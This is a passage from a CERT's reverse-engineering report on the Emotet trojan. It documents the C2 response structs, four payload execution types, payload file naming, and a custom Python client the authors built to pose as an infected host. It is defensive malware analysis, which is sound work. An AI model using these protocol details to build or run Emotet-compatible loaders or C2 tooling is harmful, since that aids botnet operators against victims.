HTTP/1.1 200 OK 
Server: nginx 
Date: Tue, 05 Jan 2021 18:09:55 GMT 
Content-Type: text/html; charset=UTF-8 
Content-Length: 87076 
Connection: keep-alive 
Vary: Accept-Encoding 
 
<compressed response signature || compressed response hash || encrypted response>

Response

Just like the request body, the response body consists of three parts, the compressed
response’s signature, the compressed response’s hash and the encrypted response. The
signature is generated by the C2 servers’ private key and the compressed response is
encrypted using the session key submitted to the C2 server as part of the request.

Figure 37. Emotet’s

encrypted response
Upon decrypting the encrypted response, the trojan retrieves a uint  representing the
decompressed response size followed by the compressed response, which can be
decompressed to the serialized response using the same LZ77-style algorithm that was used
to compress the request. Finally, the serialized response can be deserialized to the following
struct, adhering again to the common serialization rules.

struct Response { 
   struct Bytes serializedPayload; 
   uint flags; 
};

The response flags are used to inform the trojan whether to continue or terminate its
operation after executing the payload.

Response Payload

The serialized response payload is a series of serialized struct Bytes , each of which
contains a serialized response payload struct.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-c2-response.png


53/56

struct ResponsePayload { 
   uint payloadId; 
   uint payloadType; 
   struct Bytes payload; 
};

Figure 38. Emotet’s

serialized response payload
payloadId

Every payload has a unique ID. As discussed in the subsection about the request payload,
this is used to keep track of the payloads that are being executed by each compromised
system. Payload IDs are incremental integers.

payloadType

Each received payload is handled based on the payloadType property. There are 4 payload
types:

Type 1 ( 0x1 ): the payload is an executable (.exe) and it is written to a file which is
executed in a new process, using CreateProcessW() .
Type 2 ( 0x2 ): the payload is an executable (.exe) and it is written to a file which is is
executed in a new local user process, using CreateProcessAsUserW() .
Type 3 ( 0x3 ): the payload is a dynamic-link library (.dll), it is loaded into the address
space of the trojan’s process by a custom loader (similar to those discussed in previous
chapters) and then its entrypoint is called in a new thread, using CreateThread() .
Type 4 ( 0x4 ): the payload is an executable (.exe) and it is written to a file which is
executed in a new process, using CreateProcessW() , with command line arguments.

For types 1, 2 and 4, the file is stored the same directory where the executable of the trojan
resides. Its filename is generated by concatenating the name without the extension of a
random .exe or .dll file in the CSIDL_SYSTEM  ( C:\Windows\System32 ) directory, the
payload ID in a hexadecimal format ( %x ) and the “ .exe ” extension.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-c2-response-payload.png


54/56

For type 3, the entry-point is called with a non-standard reason ( 10 ) and the reserved
argument is a pointer to a struct with the system ID and the C2 servers’ public key in DER
format, as shown below.

struct DllArgs { 
   char *systemId; 
   struct Bytes c2PublicKeyDer; 
};

For type 4, the executable is called with a single command line argument, which is a base64-
encoded serialized struct with a handle to the calling process and the parent directory and
name of the calling process’ executable, as shown below. This type is used for updating
Emotet to newer versions.

struct CmdLineArgs { 
   HANDLE *hProcess; 
   WCHAR *directoryAndFilenameWithoutExtension; 
   DWORD directoryAndFilenameWithoutExtensionLength; 
}

payload

The actual data of the payload.

Chapter 5. Monitoring the updates

Introduction

In the previous chapter we thoroughly described the internals of the trojan. Having a good
understanding of the communication protocol between the trojan and the C2 network we
could now communicate with any C2 server, posing as an instance of the trojan. In this final
chapter we show the custom client that we developed in order to communicate with the C2
servers with arbitrary requests and describe the responses that we received. Furthermore,
we briefly describe how we used the Ghidra Scripting API in order to automate repeated
processes of reverse-engineering which proved to be helpful for extracting useful information
out of the received update payloads (e.g. new IP addresses of the C2 network).

Developing a custom “Emotet” client

We have already described the communication between the trojan instances and the C2
network, including the detection of the C2 servers, the structure of the requests and
responses as well as the compression and encryption algorithms. Based on this analysis we
could develop our own Emotet client, which allowed us to perform requests with arbitrary
request payloads. Like the rest of the scripts, the client was implemented in Python. The
source code can be found in client.py. Using this client, we could monitor the uptime of each
of the listed C2 servers and parse the C2 responses.

https://github.com/grnet/emotet-utils/blob/master/utilities/client.py


55/56

Most of the C2 responses were loadable DLL extensions to the trojan (type 3). The payloads
received from different C2 servers at the same point in time were identical or almost
identical, differing only in the first 48 bytes of the read-only data section. Some of the
payloads were obfuscated using variations of the techniques described in Chapter 3, while
others were not. The only update (type 4) that we received during our analysis was Europol’s
clean-up client.

From the collected statistics, only a fraction of the C2 servers were online at each time. The
set of active C2 servers was changing over time, pressumably to avoid triggering alerts and
being detected.

Automating repeated reverse-engineering processes

On each received payload we had to repeat the processes that we followed to overcome the
incorporated obfuscation techniques. Since these techniques were slightly different for each
payload (e.g. different XOR keys were used, algorithm constants were modified, variables
were stored in different memory addresses, etc.) we had to develop some pieces of code
implementing some basic logic. We used the Ghidra scripting API and developed Python
scripts that automated repeated process that required considerable manual effort.
Specifically, the two main processes that were automated are the decryption of the strings
and the resolution of the imported symbols. These basic automations made the analysis of
the received updates significantly easier. Implementation of the algorithms can also be found
in decrypt_bytes.py and generate_symbol_hashes2.py.

Epilogue

In this analysis we documented our defensive strategy against a large trojan-spreading
campaign. Our approach was based on static analysis and reverse engineering. We initially
avoided running any of the trojan’s stages. This was an intentional choice because with
dynamic analysis certain conditions and corner cases could not have been triggered and
whole code paths could have been skipped. After many hours of reverse engineering and
building enough confidence that we had a full understanding of the trojan’s inner workings,
we used dynamic instrumentation to confirm our observations. For the latter we used the
Frida dynamic instrumentation toolkit. Nevertheless, as shown by our work, the dynamic
analysis of a malware is not always required in order to undestand and analyze its
functionality.

Notice that in this analysis we only focused on analyzing the trojan itself and intentionally
skipped the analysis of payloads spread by the C2 network. From the analysis of the trojan’s
internals in Chapter 4, it became apparent that Emotet enables the C2 servers to run
arbitrary payloads on infected computers. It is known that Emotet had been used in order to
spread banking-related malware, e-mail harvesting malware, as well as ransomware.
However, analyzing those payloads was considered out of the scope of planning a generic
defense against Emotet.

https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py
https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py


56/56

Finally, we did not include any analysis of the last payload that our update-monitoring
infrastructure received, which according to our observations and combined with public
reports is Europol’s clean-up payload.

We hope that IT Security professionals will find our work useful for defending against similar
malware in the future.

© 2022 GRNET CERT.